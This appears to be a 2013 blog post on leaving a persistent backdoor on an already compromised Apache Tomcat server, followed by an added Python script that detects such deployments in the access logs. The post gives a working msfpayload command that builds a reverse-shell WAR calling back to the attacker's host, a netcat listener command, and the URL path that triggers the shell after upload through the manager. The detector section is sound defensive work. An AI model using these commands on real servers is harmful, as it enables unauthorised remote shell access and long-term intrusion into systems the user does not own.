Monday, December 23, 2013

Apache Tomcat WAR backdoor using msfpayload

If you have already compromised an Apache Tomcat web server, it is useful to leave a backdoor for later access.

You can use msfpayload for this:

The screenshot is really small, so here is the command:
#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 W > reverse_tcp.war


This creates a WAR that connects back to LHOST:LPORT and opens a basic Linux shell, so you will need a listener on your side. You can use "nc -lvp 4444" for this purpose.

To use the backdoor you need to know the JSP file name. You can find it by extracting the files from the WAR:

In this tutorial I assume you already have access to the Tomcat manager and know how to upload a WAR. After you have uploaded it, you can call the backdoor at any time by accessing:

http://:/reverse_tcp/xsltvorkye.jsp

And that's it! :)
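
On the defending side, the sequence described above (a WAR pushed through the Tomcat manager, then a request to a JSP in a context that did not exist before) is visible in the access log. The Python below is an added example, not part of the original post; it assumes the AccessLogValve "common" log pattern and a one-hour correlation window, and the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Manager endpoints that accept a WAR: HTML upload form and the text interface.
DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy|deploy)\b')
WINDOW = timedelta(hours=1)  # assumption: correlation window, tune per site

# Constructed sample log; the JSP path is the one shown in the post.
SAMPLE = '''\
10.0.0.5 - - [23/Dec/2013:10:00:01 +0000] "GET /shop/index.jsp HTTP/1.1" 200 5120
203.0.113.7 - admin [23/Dec/2013:10:05:12 +0000] "GET /manager/html HTTP/1.1" 200 17432
203.0.113.7 - admin [23/Dec/2013:10:05:40 +0000] "POST /manager/html/upload HTTP/1.1" 200 18011
10.0.0.5 - - [23/Dec/2013:10:06:00 +0000] "GET /shop/cart.jsp HTTP/1.1" 200 2048
203.0.113.7 - - [23/Dec/2013:10:06:30 +0000] "GET /reverse_tcp/xsltvorkye.jsp HTTP/1.1" 200 -
'''.splitlines()


def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    host, user, ts, method, url, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return host, user, when, method, url.split("?")[0], int(status)


def find_suspect_jsps(lines):
    """Map JSP path -> (context, deploy time, deploying client, manager user)
    for JSPs served from a context first seen shortly after a manager deploy."""
    first_seen, deploys, findings = {}, [], {}
    for host, user, when, method, path, status in filter(None, map(parse, lines)):
        if DEPLOY.match(path) and method in ("POST", "PUT") and status < 400:
            deploys.append((when, host, user))
            continue
        parts = path.lstrip("/").split("/")
        context = "/" + parts[0] if len(parts) > 1 else "/"  # "/" is ROOT
        born = first_seen.setdefault(context, when)
        if path.endswith(".jsp") and status == 200 and path not in findings:
            for dep_time, dep_host, dep_user in deploys:
                if timedelta(0) <= born - dep_time <= WINDOW:
                    findings[path] = (context, dep_time.isoformat(), dep_host, dep_user)
                    break
    return findings


if __name__ == "__main__":
    for jsp, detail in find_suspect_jsps(SAMPLE).items():
        print(jsp, detail)
```

Feed it enough log history that long-standing applications are seen before any deploy event; otherwise a legitimate but rarely visited context can be reported as new.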
